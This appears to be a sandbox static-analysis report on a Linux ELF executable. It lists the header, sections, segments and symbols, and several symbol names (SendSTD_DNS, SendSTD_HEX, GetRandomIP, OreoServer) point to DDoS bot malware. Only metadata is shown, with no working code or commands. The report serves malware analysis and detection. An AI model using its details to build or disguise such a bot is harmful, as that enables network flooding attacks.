          SSDEEP:3072:RuHPhplEB6FcTIkBwiVkmXv8a1tiVmecPnQrNXtZ75ObpARM/ofjmu2QmMKhc3pY:q8AzSVkKkU4Vmf/QVN4ARM/ormu2QmMG
          File Content Preview:.ELF..............>.......@.....@........L..........@.8...@.......................@.......@.....,/......,/.......................0.......0R......0R..............~..............Q.td....................................................H...._....J...H........

          Static ELF Info

          ELF header

          Class:ELF64
          Data:2's complement, little endian
          Version:1 (current)
          Machine:Advanced Micro Devices X86-64
          Version Number:0x1
          Type:EXEC (Executable file)
          OS/ABI:UNIX - System V
          ABI Version:0
          Entry Point Address:0x400194
          Flags:0x0
          ELF Header Size:64
          Program Header Offset:64
          Program Header Size:56
          Number of Program Headers:3
          Section Header Offset:150744
          Section Header Size:64
          Number of Section Headers:15
          Header String Table Index:12

          Sections

          NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
          NULL0x00x00x00x00x0000
          .initPROGBITS0x4000e80xe80x130x00x6AX001
          .textPROGBITS0x4001000x1000x1cf780x00x6AX0016
          .finiPROGBITS0x41d0780x1d0780xe0x00x6AX001
          .rodataPROGBITS0x41d0a00x1d0a00x5e860x00x2A0032
          .eh_framePROGBITS0x422f280x22f280x40x00x2A004
          .ctorsPROGBITS0x5230000x230000x100x00x3WA008
          .dtorsPROGBITS0x5230100x230100x100x00x3WA008
          .jcrPROGBITS0x5230200x230200x80x00x3WA008
          .dataPROGBITS0x5230400x230400xe680x00x3WA0032
          .bssNOBITS0x523ec00x23ea80x6ff00x00x3WA0032
          .commentPROGBITS0x00x23ea80xdc80x00x0001
          .shstrtabSTRTAB0x00x24c700x660x00x0001
          .symtabSYMTAB0x00x250980x62400x180x0143388
          .strtabSTRTAB0x00x2b2d80x32340x00x0001

          Program Segments

          TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeFlagsFlags DescriptionAlignProg InterpreterSection Mappings
          LOAD0x00x4000000x4000000x22f2c0x22f2c0x5R E0x100000.init .text .fini .rodata .eh_frame
          LOAD0x230000x5230000x5230000xea80x7eb00x6RW 0x100000.ctors .dtors .jcr .data .bss
          GNU_STACK0x00x00x00x00x00x6RW 0x8

          Symbols

          NameVersion Info NameVersion Info File NameSection NameValueSizeSymbol TypeSymbol BindSymbol VisibilityNdx
          .symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
          .symtab0x4000e80SECTION<unknown>DEFAULT1
          .symtab0x4001000SECTION<unknown>DEFAULT2
          .symtab0x41d0780SECTION<unknown>DEFAULT3
          .symtab0x41d0a00SECTION<unknown>DEFAULT4
          .symtab0x422f280SECTION<unknown>DEFAULT5
          .symtab0x5230000SECTION<unknown>DEFAULT6
          .symtab0x5230100SECTION<unknown>DEFAULT7
          .symtab0x5230200SECTION<unknown>DEFAULT8
          .symtab0x5230400SECTION<unknown>DEFAULT9
          .symtab0x523ec00SECTION<unknown>DEFAULT10
          .symtab0x00SECTION<unknown>DEFAULT11
          .symtab0x00SECTION<unknown>DEFAULT12
          .symtab0x00SECTION<unknown>DEFAULT13
          .symtab0x00SECTION<unknown>DEFAULT14
          C.187.6709.symtab0x41ed001728OBJECT<unknown>DEFAULT4
          C.265.7232.symtab0x41fa0088OBJECT<unknown>DEFAULT4
          C.76.5655.symtab0x41db00192OBJECT<unknown>DEFAULT4
          ClearHistory.symtab0x403a8a36FUNC<unknown>DEFAULT2
          GetRandomIP.symtab0x401a3147FUNC<unknown>DEFAULT2
          LOCAL_ADDR.symtab0x52a48c4OBJECT<unknown>DEFAULT10
          LOOKUP.12789.symtab0x5239b08OBJECT<unknown>DEFAULT9
          OreoServer.symtab0x5230e08OBJECT<unknown>DEFAULT9
          ProcessPacket.symtab0x4116d3182FUNC<unknown>DEFAULT2
          Q.symtab0x52406016384OBJECT<unknown>DEFAULT10
          RandString.symtab0x4016ac109FUNC<unknown>DEFAULT2
          SendSTD_DNS.symtab0x405243826FUNC<unknown>DEFAULT2
          SendSTD_HEX.symtab0x40557d323FUNC<unknown>DEFAULT2
          TBL.12788.symtab0x4210a023OBJECT<unknown>DEFAULT4
          _Jv_RegisterClasses.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
          _READ.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          _WRITE.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          __CTOR_END__.symtab0x5230080OBJECT<unknown>DEFAULT6
          __CTOR_LIST__.symtab0x5230000OBJECT<unknown>DEFAULT6
          __C_ctype_b.symtab0x523a188OBJECT<unknown>DEFAULT9
          __C_ctype_b.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          __C_ctype_b_data.symtab0x4211e0768OBJECT<unknown>DEFAULT4
          __C_ctype_tolower.symtab0x523e308OBJECT<unknown>DEFAULT9
          __C_ctype_tolower.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          __C_ctype_tolower_data.symtab0x422aa0768OBJECT<unknown>DEFAULT4
          __C_ctype_toupper.symtab0x523a288OBJECT<unknown>DEFAULT9
          __C_ctype_toupper.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          __C_ctype_toupper_data.symtab0x4214e0768OBJECT<unknown>DEFAULT4
          __DTOR_END__.symtab0x5230180OBJECT<unknown>DEFAULT7
          __DTOR_LIST__.symtab0x5230100OBJECT<unknown>DEFAULT7
          __EH_FRAME_BEGIN__.symtab0x422f280OBJECT<unknown>DEFAULT5
          __FRAME_END__.symtab0x422f280OBJECT<unknown>DEFAULT5
          __GI___C_ctype_b.symtab0x523a188OBJECT<unknown>HIDDEN9
          __GI___C_ctype_b_data.symtab0x4211e0768OBJECT<unknown>HIDDEN4
          __GI___C_ctype_tolower.symtab0x523e308OBJECT<unknown>HIDDEN9
          __GI___C_ctype_tolower_data.symtab0x422aa0768OBJECT<unknown>HIDDEN4
          __GI___C_ctype_toupper.symtab0x523a288OBJECT<unknown>HIDDEN9
          __GI___C_ctype_toupper_data.symtab0x4214e0768OBJECT<unknown>HIDDEN4
          __GI___ctype_b.symtab0x523a208OBJECT<unknown>HIDDEN9
          __GI___ctype_tolower.symtab0x523e388OBJECT<unknown>HIDDEN9
          __GI___ctype_toupper.symtab0x523a308OBJECT<unknown>HIDDEN9
          __GI___errno_location.symtab0x412f4c6FUNC<unknown>HIDDEN2
          __GI___fgetc_unlocked.symtab0x41abb8222FUNC<unknown>HIDDEN2
          __GI___fputc_unlocked.symtab0x414bb4192FUNC<unknown>HIDDEN2
          __GI___glibc_strerror_r.symtab0x41569014FUNC<unknown>HIDDEN2
          __GI___h_errno_location.symtab0x41a1186FUNC<unknown>HIDDEN2
          __GI___libc_fcntl.symtab0x41241c100FUNC<unknown>HIDDEN2
          __GI___libc_lseek.symtab0x419e5045FUNC<unknown>HIDDEN2
          __GI___libc_open.symtab0x41273c106FUNC<unknown>HIDDEN2
          __GI___uClibc_fini.symtab0x4197e070FUNC<unknown>HIDDEN2
          __GI___uClibc_init.symtab0x41985f67FUNC<unknown>HIDDEN2
          __GI___xpg_strerror_r.symtab0x4156a0194FUNC<unknown>HIDDEN2
          __GI__exit.symtab0x41248042FUNC<unknown>HIDDEN2
          __GI_abort.symtab0x418b68276FUNC<unknown>HIDDEN2
          __GI_asprintf.symtab0x413264142FUNC<unknown>HIDDEN2
          __GI_atoi.symtab0x41919c18FUNC<unknown>HIDDEN2
          __GI_brk.symtab0x41c3f443FUNC<unknown>HIDDEN2
          __GI_clock_getres.symtab0x419bd441FUNC<unknown>HIDDEN2
          __GI_close.symtab0x4124ac41FUNC<unknown>HIDDEN2
          __GI_closedir.symtab0x412a64116FUNC<unknown>HIDDEN2
          __GI_connect.symtab0x41779043FUNC<unknown>HIDDEN2
          __GI_dup2.symtab0x4124d844FUNC<unknown>HIDDEN2
          __GI_endservent.symtab0x41b1fe90FUNC<unknown>HIDDEN2
          __GI_errno.symtab0x52a37c4OBJECT<unknown>HIDDEN10
          __GI_execl.symtab0x41938c287FUNC<unknown>HIDDEN2
          __GI_execve.symtab0x419c0038FUNC<unknown>HIDDEN2
          __GI_exit.symtab0x41933092FUNC<unknown>HIDDEN2
          __GI_fclose.symtab0x412f84259FUNC<unknown>HIDDEN2
          __GI_fcntl.symtab0x41241c100FUNC<unknown>HIDDEN2
          __GI_fcntl64.symtab0x41241c100FUNC<unknown>HIDDEN2
          __GI_fflush.symtab0x4146c8113FUNC<unknown>HIDDEN2
          __GI_fflush_unlocked.symtab0x4149f4329FUNC<unknown>HIDDEN2
          __GI_fgetc_unlocked.symtab0x41abb8222FUNC<unknown>HIDDEN2
          __GI_fgets.symtab0x41473c109FUNC<unknown>HIDDEN2
          __GI_fgets_unlocked.symtab0x414b40116FUNC<unknown>HIDDEN2
          __GI_fopen.symtab0x41308810FUNC<unknown>HIDDEN2
          __GI_fork.symtab0x41250438FUNC<unknown>HIDDEN2
          __GI_fprintf.symtab0x413148142FUNC<unknown>HIDDEN2
          __GI_fputc.symtab0x4147ac146FUNC<unknown>HIDDEN2
          __GI_fputs.symtab0x41484097FUNC<unknown>HIDDEN2
          __GI_fputs_unlocked.symtab0x414c7456FUNC<unknown>HIDDEN2
          __GI_freeaddrinfo.symtab0x41640522FUNC<unknown>HIDDEN2
          __GI_fseek.symtab0x41c4205FUNC<unknown>HIDDEN2
          __GI_fseeko64.symtab0x41c484218FUNC<unknown>HIDDEN2
          __GI_fstat.symtab0x419c2882FUNC<unknown>HIDDEN2
          __GI_fstat64.symtab0x419c2882FUNC<unknown>HIDDEN2
          __GI_fwrite.symtab0x4148a4119FUNC<unknown>HIDDEN2
          __GI_fwrite_unlocked.symtab0x414cac134FUNC<unknown>HIDDEN2
          __GI_getaddrinfo.symtab0x41641b697FUNC<unknown>HIDDEN2
          __GI_getc_unlocked.symtab0x41abb8222FUNC<unknown>HIDDEN2
          __GI_getcwd.symtab0x41252c203FUNC<unknown>HIDDEN2
          __GI_getdtablesize.symtab0x4125f835FUNC<unknown>HIDDEN2
          __GI_getegid.symtab0x419da838FUNC<unknown>HIDDEN2
          __GI_geteuid.symtab0x419dd038FUNC<unknown>HIDDEN2
          __GI_getgid.symtab0x419df838FUNC<unknown>HIDDEN2
          __GI_gethostbyaddr_r.symtab0x4173e0944FUNC<unknown>HIDDEN2
          __GI_gethostbyname.symtab0x416ce453FUNC<unknown>HIDDEN2
          __GI_gethostbyname2_r.symtab0x4170a0829FUNC<unknown>HIDDEN2
          __GI_gethostbyname_r.symtab0x416d1c897FUNC<unknown>HIDDEN2
          __GI_getpagesize.symtab0x41261c19FUNC<unknown>HIDDEN2
          __GI_getpid.symtab0x41263038FUNC<unknown>HIDDEN2
          __GI_getrlimit.symtab0x41268040FUNC<unknown>HIDDEN2
          __GI_getservbyname_r.symtab0x41b3c8233FUNC<unknown>HIDDEN2
          __GI_getservbyport.symtab0x41b38765FUNC<unknown>HIDDEN2
          __GI_getservbyport_r.symtab0x41b2cb188FUNC<unknown>HIDDEN2
          __GI_getservent_r.symtab0x41afeb485FUNC<unknown>HIDDEN2
          __GI_getsockname.symtab0x4177bc41FUNC<unknown>HIDDEN2
          __GI_getuid.symtab0x419e2038FUNC<unknown>HIDDEN2
          __GI_h_errno.symtab0x52a3804OBJECT<unknown>HIDDEN10
          __GI_if_freenameindex.symtab0x41b78648FUNC<unknown>HIDDEN2
          __GI_if_nameindex.symtab0x41b5dc426FUNC<unknown>HIDDEN2
          __GI_if_nametoindex.symtab0x41b569115FUNC<unknown>HIDDEN2
          __GI_in6addr_loopback.symtab0x42256016OBJECT<unknown>HIDDEN4
          __GI_inet_addr.symtab0x416cc828FUNC<unknown>HIDDEN2
          __GI_inet_aton.symtab0x41b7b8137FUNC<unknown>HIDDEN2
          __GI_inet_ntoa.symtab0x416cbd10FUNC<unknown>HIDDEN2
          __GI_inet_ntoa_r.symtab0x416c7077FUNC<unknown>HIDDEN2
          __GI_inet_ntop.symtab0x416a60527FUNC<unknown>HIDDEN2
          __GI_inet_pton.symtab0x41675b493FUNC<unknown>HIDDEN2
          __GI_initstate_r.symtab0x418f93185FUNC<unknown>HIDDEN2
          __GI_ioctl.symtab0x4126a8104FUNC<unknown>HIDDEN2
          __GI_isatty.symtab0x41581425FUNC<unknown>HIDDEN2
          __GI_kill.symtab0x41271044FUNC<unknown>HIDDEN2
          __GI_lseek.symtab0x419e5045FUNC<unknown>HIDDEN2
          __GI_lseek64.symtab0x419e485FUNC<unknown>HIDDEN2
          __GI_memchr.symtab0x41acfc240FUNC<unknown>HIDDEN2
          __GI_memcpy.symtab0x414d40102FUNC<unknown>HIDDEN2
          __GI_memmove.symtab0x415224734FUNC<unknown>HIDDEN2
          __GI_mempcpy.symtab0x41aca090FUNC<unknown>HIDDEN2
          __GI_memrchr.symtab0x41adec237FUNC<unknown>HIDDEN2
          __GI_memset.symtab0x414db0210FUNC<unknown>HIDDEN2
          __GI_mmap.symtab0x419ba448FUNC<unknown>HIDDEN2
          __GI_mremap.symtab0x419e8042FUNC<unknown>HIDDEN2
          __GI_munmap.symtab0x419eac38FUNC<unknown>HIDDEN2
          __GI_nanosleep.symtab0x419ed438FUNC<unknown>HIDDEN2
          __GI_open.symtab0x41273c106FUNC<unknown>HIDDEN2
          __GI_opendir.symtab0x412ad8243FUNC<unknown>HIDDEN2
          __GI_perror.symtab0x41309445FUNC<unknown>HIDDEN2
          __GI_pipe.symtab0x4127b438FUNC<unknown>HIDDEN2
          __GI_poll.symtab0x4127dc41FUNC<unknown>HIDDEN2
          __GI_putc.symtab0x4147ac146FUNC<unknown>HIDDEN2
          __GI_putc_unlocked.symtab0x414bb4192FUNC<unknown>HIDDEN2
          __GI_raise.symtab0x41c3c818FUNC<unknown>HIDDEN2
          __GI_random.symtab0x418c8872FUNC<unknown>HIDDEN2
          __GI_random_r.symtab0x418e9090FUNC<unknown>HIDDEN2
          __GI_rawmemchr.symtab0x41c7e0190FUNC<unknown>HIDDEN2
          __GI_read.symtab0x41283439FUNC<unknown>HIDDEN2
          __GI_readdir.symtab0x412bcc143FUNC<unknown>HIDDEN2
          __GI_readlink.symtab0x41285c39FUNC<unknown>HIDDEN2
          __GI_recv.symtab0x41781c11FUNC<unknown>HIDDEN2
          __GI_recvfrom.symtab0x41782845FUNC<unknown>HIDDEN2
          __GI_rewind.symtab0x41c42892FUNC<unknown>HIDDEN2
          __GI_sbrk.symtab0x419efc74FUNC<unknown>HIDDEN2
          __GI_select.symtab0x41288444FUNC<unknown>HIDDEN2
          __GI_send.symtab0x41785811FUNC<unknown>HIDDEN2
          __GI_sendto.symtab0x41786448FUNC<unknown>HIDDEN2
          __GI_seteuid.symtab0x4128b075FUNC<unknown>HIDDEN2
          __GI_setresuid.symtab0x4128fc44FUNC<unknown>HIDDEN2
          __GI_setreuid.symtab0x41292842FUNC<unknown>HIDDEN2
          __GI_setservent.symtab0x41b258115FUNC<unknown>HIDDEN2
          __GI_setsockopt.symtab0x41789453FUNC<unknown>HIDDEN2
          __GI_setstate_r.symtab0x418de8168FUNC<unknown>HIDDEN2
          __GI_sigaction.symtab0x419a95247FUNC<unknown>HIDDEN2
          __GI_sigaddset.symtab0x4178fc35FUNC<unknown>HIDDEN2
          __GI_sigemptyset.symtab0x41792020FUNC<unknown>HIDDEN2
          __GI_signal.symtab0x417934168FUNC<unknown>HIDDEN2
          __GI_sigprocmask.symtab0x41297c85FUNC<unknown>HIDDEN2
          __GI_sleep.symtab0x4194ac415FUNC<unknown>HIDDEN2
          __GI_snprintf.symtab0x4131d8137FUNC<unknown>HIDDEN2
          __GI_socket.symtab0x4178cc47FUNC<unknown>HIDDEN2
          __GI_sprintf.symtab0x4132f4149FUNC<unknown>HIDDEN2
          __GI_srandom_r.symtab0x418eea169FUNC<unknown>HIDDEN2
          __GI_strcasecmp.symtab0x41577448FUNC<unknown>HIDDEN2
          __GI_strcasestr.symtab0x4157a470FUNC<unknown>HIDDEN2
          __GI_strchr.symtab0x414e90417FUNC<unknown>HIDDEN2
          __GI_strcmp.symtab0x41503433FUNC<unknown>HIDDEN2
          __GI_strcoll.symtab0x41503433FUNC<unknown>HIDDEN2
          __GI_strcpy.symtab0x415060213FUNC<unknown>HIDDEN2
          __GI_strdup.symtab0x41c91854FUNC<unknown>HIDDEN2
          __GI_strerror.symtab0x4157ec26FUNC<unknown>HIDDEN2
          __GI_strlen.symtab0x415140225FUNC<unknown>HIDDEN2
          __GI_strncat.symtab0x41c8a0119FUNC<unknown>HIDDEN2
          __GI_strncpy.symtab0x41aedc131FUNC<unknown>HIDDEN2
          __GI_strnlen.symtab0x415504206FUNC<unknown>HIDDEN2
          __GI_strpbrk.symtab0x41c6c8140FUNC<unknown>HIDDEN2
          __GI_strspn.symtab0x41c758135FUNC<unknown>HIDDEN2
          __GI_strstr.symtab0x4155d4187FUNC<unknown>HIDDEN2
          __GI_strtok.symtab0x41580810FUNC<unknown>HIDDEN2
          __GI_strtok_r.symtab0x41af6094FUNC<unknown>HIDDEN2
          __GI_strtol.symtab0x4191b010FUNC<unknown>HIDDEN2
          __GI_strtoll.symtab0x4191b010FUNC<unknown>HIDDEN2
          __GI_strtoul.symtab0x4191bc7FUNC<unknown>HIDDEN2
          __GI_strtoull.symtab0x4191bc7FUNC<unknown>HIDDEN2
          __GI_sysconf.symtab0x41964c351FUNC<unknown>HIDDEN2
          __GI_tcgetattr.symtab0x415830110FUNC<unknown>HIDDEN2
          __GI_time.symtab0x4129d439FUNC<unknown>HIDDEN2
          __GI_times.symtab0x419f4839FUNC<unknown>HIDDEN2
          __GI_tolower.symtab0x41a0f830FUNC<unknown>HIDDEN2
          __GI_toupper.symtab0x412a4430FUNC<unknown>HIDDEN2
          __GI_vasprintf.symtab0x41338c146FUNC<unknown>HIDDEN2
          __GI_vfork.symtab0x41240421FUNC<unknown>HIDDEN2
          __GI_vfprintf.symtab0x41383c143FUNC<unknown>HIDDEN2
          __GI_vsnprintf.symtab0x413420199FUNC<unknown>HIDDEN2
          __GI_wait4.symtab0x419f7047FUNC<unknown>HIDDEN2
          __GI_waitpid.symtab0x4129fc7FUNC<unknown>HIDDEN2
          __GI_wcrtomb.symtab0x41a12068FUNC<unknown>HIDDEN2
          __GI_wcsnrtombs.symtab0x41a174140FUNC<unknown>HIDDEN2
          __GI_wcsrtombs.symtab0x41a16415FUNC<unknown>HIDDEN2
          __GI_write.symtab0x412a0442FUNC<unknown>HIDDEN2
          __JCR_END__.symtab0x5230200OBJECT<unknown>DEFAULT8
          __JCR_LIST__.symtab0x5230200OBJECT<unknown>DEFAULT8
          __app_fini.symtab0x52a3688OBJECT<unknown>HIDDEN10
          __atexit_lock.symtab0x523e0040OBJECT<unknown>DEFAULT9
          __bsd_signal.symtab0x417934168FUNC<unknown>HIDDEN2
          __bss_start.symtab0x523ea80NOTYPE<unknown>DEFAULTSHN_ABS
          __check_one_fd.symtab0x41982a53FUNC<unknown>DEFAULT2
          __ctype_b.symtab0x523a208OBJECT<unknown>DEFAULT9
          __ctype_tolower.symtab0x523e388OBJECT<unknown>DEFAULT9
          __ctype_toupper.symtab0x523a308OBJECT<unknown>DEFAULT9
          __curbrk.symtab0x52a4308OBJECT<unknown>HIDDEN10
          __data_start.symtab0x5230500NOTYPE<unknown>DEFAULT9
          __decode_answer.symtab0x41cafc242FUNC<unknown>HIDDEN2
          __decode_dotted.symtab0x41b844246FUNC<unknown>HIDDEN2
          __decode_header.symtab0x41c9f4161FUNC<unknown>HIDDEN2
          __deregister_frame_info.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
          __dns_lookup.symtab0x41b93c1862FUNC<unknown>HIDDEN2
          __do_global_ctors_aux.symtab0x41d0400FUNC<unknown>DEFAULT2
          __do_global_dtors_aux.symtab0x4001000FUNC<unknown>DEFAULT2
          __dso_handle.symtab0x5230400OBJECT<unknown>HIDDEN9
          __encode_dotted.symtab0x41cf58160FUNC<unknown>HIDDEN2
          __encode_header.symtab0x41c950163FUNC<unknown>HIDDEN2
          __encode_question.symtab0x41ca9880FUNC<unknown>HIDDEN2
          __environ.symtab0x52a3588OBJECT<unknown>DEFAULT10
          __errno_location.symtab0x412f4c6FUNC<unknown>DEFAULT2
          __errno_location.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          __error.symtab0x412e03326FUNC<unknown>HIDDEN2
          __error_at_line.symtab0x412c5c423FUNC<unknown>HIDDEN2
          __exit_cleanup.symtab0x52a3488OBJECT<unknown>HIDDEN10
          __fgetc_unlocked.symtab0x41abb8222FUNC<unknown>DEFAULT2
          __fini_array_end.symtab0x5230000NOTYPE<unknown>HIDDENSHN_ABS
          __fini_array_start.symtab0x5230000NOTYPE<unknown>HIDDENSHN_ABS
          __fputc_unlocked.symtab0x414bb4192FUNC<unknown>DEFAULT2
          __get_hosts_byaddr_r.symtab0x41c30c138FUNC<unknown>HIDDEN2
          __get_hosts_byname_r.symtab0x41c2dc48FUNC<unknown>HIDDEN2
          __getdents.symtab0x419c7c300FUNC<unknown>HIDDEN2
          __getdents64.symtab0x419c7c300FUNC<unknown>HIDDEN2
          __getpagesize.symtab0x41261c19FUNC<unknown>DEFAULT2
          __glibc_strerror_r.symtab0x41569014FUNC<unknown>DEFAULT2
          __glibc_strerror_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          __h_errno_location.symtab0x41a1186FUNC<unknown>DEFAULT2
          __h_errno_location.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          __init_array_end.symtab0x5230000NOTYPE<unknown>HIDDENSHN_ABS
          __init_array_start.symtab0x5230000NOTYPE<unknown>HIDDENSHN_ABS
          __initbuf.symtab0x41afc043FUNC<unknown>DEFAULT2
          __length_dotted.symtab0x41cff859FUNC<unknown>HIDDEN2
          __length_question.symtab0x41cae819FUNC<unknown>HIDDEN2
          __libc_close.symtab0x4124ac41FUNC<unknown>DEFAULT2
          __libc_connect.symtab0x41779043FUNC<unknown>DEFAULT2
          __libc_creat.symtab0x4127a614FUNC<unknown>DEFAULT2
          __libc_fcntl.symtab0x41241c100FUNC<unknown>DEFAULT2
          __libc_fcntl64.symtab0x41241c100FUNC<unknown>DEFAULT2
          __libc_fork.symtab0x41250438FUNC<unknown>DEFAULT2
          __libc_getpid.symtab0x41263038FUNC<unknown>DEFAULT2
          __libc_lseek.symtab0x419e5045FUNC<unknown>DEFAULT2
          __libc_lseek64.symtab0x419e485FUNC<unknown>DEFAULT2
          __libc_nanosleep.symtab0x419ed438FUNC<unknown>DEFAULT2
          __libc_open.symtab0x41273c106FUNC<unknown>DEFAULT2
          __libc_poll.symtab0x4127dc41FUNC<unknown>DEFAULT2
          __libc_read.symtab0x41283439FUNC<unknown>DEFAULT2
          __libc_recv.symtab0x41781c11FUNC<unknown>DEFAULT2
          __libc_recvfrom.symtab0x41782845FUNC<unknown>DEFAULT2
          __libc_select.symtab0x41288444FUNC<unknown>DEFAULT2
          __libc_send.symtab0x41785811FUNC<unknown>DEFAULT2
          __libc_sendto.symtab0x41786448FUNC<unknown>DEFAULT2
          __libc_sigaction.symtab0x419a95247FUNC<unknown>DEFAULT2
          __libc_stack_end.symtab0x52a3508OBJECT<unknown>DEFAULT10
          __libc_system.symtab0x41904c335FUNC<unknown>DEFAULT2
          __libc_waitpid.symtab0x4129fc7FUNC<unknown>DEFAULT2
          __libc_write.symtab0x412a0442FUNC<unknown>DEFAULT2
          __malloc_consolidate.symtab0x4187ed410FUNC<unknown>HIDDEN2
          __malloc_largebin_index.symtab0x417a3896FUNC<unknown>DEFAULT2
          __malloc_lock.symtab0x523c8040OBJECT<unknown>DEFAULT9
          __malloc_state.symtab0x52a7801752OBJECT<unknown>DEFAULT10
          __malloc_trim.symtab0x418754153FUNC<unknown>DEFAULT2
          __nameserver.symtab0x52ae8024OBJECT<unknown>HIDDEN10
          __nameservers.symtab0x52ae984OBJECT<unknown>HIDDEN10
          __open_etc_hosts.symtab0x41cbf042FUNC<unknown>HIDDEN2
          __open_nameservers.symtab0x41c084597FUNC<unknown>HIDDEN2
          __opensock.symtab0x41c39845FUNC<unknown>HIDDEN2
          __pagesize.symtab0x52a3608OBJECT<unknown>DEFAULT10
          __preinit_array_end.symtab0x5230000NOTYPE<unknown>HIDDENSHN_ABS
          __preinit_array_start.symtab0x5230000NOTYPE<unknown>HIDDENSHN_ABS
          __pthread_initialize_minimal.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
          __pthread_mutex_init.symtab0x4198263FUNC<unknown>DEFAULT2
          __pthread_mutex_lock.symtab0x4198263FUNC<unknown>DEFAULT2
          __pthread_mutex_trylock.symtab0x4198263FUNC<unknown>DEFAULT2
          __pthread_mutex_unlock.symtab0x4198263FUNC<unknown>DEFAULT2
          __pthread_return_0.symtab0x4198263FUNC<unknown>DEFAULT2
          __pthread_return_void.symtab0x4198291FUNC<unknown>DEFAULT2
          __raise.symtab0x41c3c818FUNC<unknown>HIDDEN2
          __read_etc_hosts_r.symtab0x41cc1a830FUNC<unknown>HIDDEN2
          __register_frame_info.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
          __resolv_lock.symtab0x523e8040OBJECT<unknown>DEFAULT9
          __restore_rt.symtab0x419a8c0NOTYPE<unknown>DEFAULT2
          __rtld_fini.symtab0x52a3708OBJECT<unknown>HIDDEN10
          __searchdomain.symtab0x52ae6032OBJECT<unknown>HIDDEN10
          __searchdomains.symtab0x52ae9c4OBJECT<unknown>HIDDEN10
          __sigaddset.symtab0x4179fc28FUNC<unknown>DEFAULT2
          __sigdelset.symtab0x417a1830FUNC<unknown>DEFAULT2
          __sigismember.symtab0x4179dc32FUNC<unknown>DEFAULT2
          __stdin.symtab0x523a588OBJECT<unknown>DEFAULT9
          __stdio_READ.symtab0x41c56058FUNC<unknown>HIDDEN2
          __stdio_WRITE.symtab0x41a200147FUNC<unknown>HIDDEN2
          __stdio_adjust_position.symtab0x41c59c133FUNC<unknown>HIDDEN2
          __stdio_fwrite.symtab0x41a294259FUNC<unknown>HIDDEN2
          __stdio_init_mutex.symtab0x41377b15FUNC<unknown>HIDDEN2
          __stdio_mutex_initializer.4280.symtab0x42180040OBJECT<unknown>DEFAULT4
          __stdio_rfill.symtab0x41c62437FUNC<unknown>HIDDEN2
          __stdio_seek.symtab0x41c6a831FUNC<unknown>HIDDEN2
          __stdio_trans2r_o.symtab0x41c64c90FUNC<unknown>HIDDEN2
          __stdio_trans2w_o.symtab0x41a398148FUNC<unknown>HIDDEN2
          __stdio_wcommit.symtab0x41381439FUNC<unknown>HIDDEN2
          __stdout.symtab0x523a608OBJECT<unknown>DEFAULT9
          __syscall_error.symtab0x419b8c22FUNC<unknown>HIDDEN2
          __syscall_error.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          __syscall_fcntl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          __uClibc_fini.symtab0x4197e070FUNC<unknown>DEFAULT2
          __uClibc_init.symtab0x41985f67FUNC<unknown>DEFAULT2
          __uClibc_main.symtab0x4198a2489FUNC<unknown>DEFAULT2
          __uClibc_main.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          __uclibc_progname.symtab0x523e288OBJECT<unknown>HIDDEN9
          __vfork.symtab0x41240421FUNC<unknown>HIDDEN2
          __xpg_strerror_r.symtab0x4156a0194FUNC<unknown>DEFAULT2
          __xpg_strerror_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          __xstat64_conv.symtab0x419fa0172FUNC<unknown>HIDDEN2
          __xstat_conv.symtab0x41a04c172FUNC<unknown>HIDDEN2
          _adjust_pos.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          _charpad.symtab0x4138cc68FUNC<unknown>DEFAULT2
          _cs_funcs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          _dl_aux_init.symtab0x41c3dc23FUNC<unknown>DEFAULT2
          _dl_phdr.symtab0x52aea08OBJECT<unknown>DEFAULT10
          _dl_phnum.symtab0x52aea88OBJECT<unknown>DEFAULT10
          _edata.symtab0x523ea80NOTYPE<unknown>DEFAULTSHN_ABS
          _end.symtab0x52aeb00NOTYPE<unknown>DEFAULTSHN_ABS
          _errno.symtab0x52a37c4OBJECT<unknown>DEFAULT10
          _exit.symtab0x41248042FUNC<unknown>DEFAULT2
          _exit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          _fini.symtab0x41d0785FUNC<unknown>DEFAULT3
          _fixed_buffers.symtab0x5280c08192OBJECT<unknown>DEFAULT10
          _fopen.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          _fp_out_narrow.symtab0x413910120FUNC<unknown>DEFAULT2
          _fpmaxtostr.symtab0x41a5701608FUNC<unknown>HIDDEN2
          _fpmaxtostr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          _fwrite.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          _h_errno.symtab0x52a3804OBJECT<unknown>DEFAULT10
          _init.symtab0x4000e85FUNC<unknown>DEFAULT1
          _load_inttype.symtab0x41a42c85FUNC<unknown>HIDDEN2
          _load_inttype.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          _ppfs_init.symtab0x413fc4114FUNC<unknown>HIDDEN2
          _ppfs_init.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          _ppfs_parsespec.symtab0x4142761022FUNC<unknown>HIDDEN2
          _ppfs_parsespec.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          _ppfs_prepargs.symtab0x41403867FUNC<unknown>HIDDEN2
          _ppfs_prepargs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          _ppfs_setargs.symtab0x41407c457FUNC<unknown>HIDDEN2
          _ppfs_setargs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          _promoted_size.symtab0x41424846FUNC<unknown>DEFAULT2
